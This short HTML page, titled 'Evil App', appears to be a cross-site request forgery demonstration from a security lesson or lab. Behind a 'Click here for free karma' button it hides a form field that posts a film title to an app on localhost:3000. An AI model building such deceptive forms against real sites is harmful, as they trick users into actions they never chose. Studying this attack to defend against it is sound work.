<!DOCTYPE html>

<html lang="en">

<head>
  <meta charset="UTF-8" />
  <title>Evil App</title>
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <meta name="description" content="" />
  <link rel="icon" href="favicon.png">
</head>

<body>
  <h1>Evil app 😈</h1>
  <form method="post" action="http://localhost:3000">
    <label>
      Click here for free karma
      <input name="film" hidden value="Total Recall (2012)" />
      <button>Submit</button>
    </label>
  </form>
</body>

</html>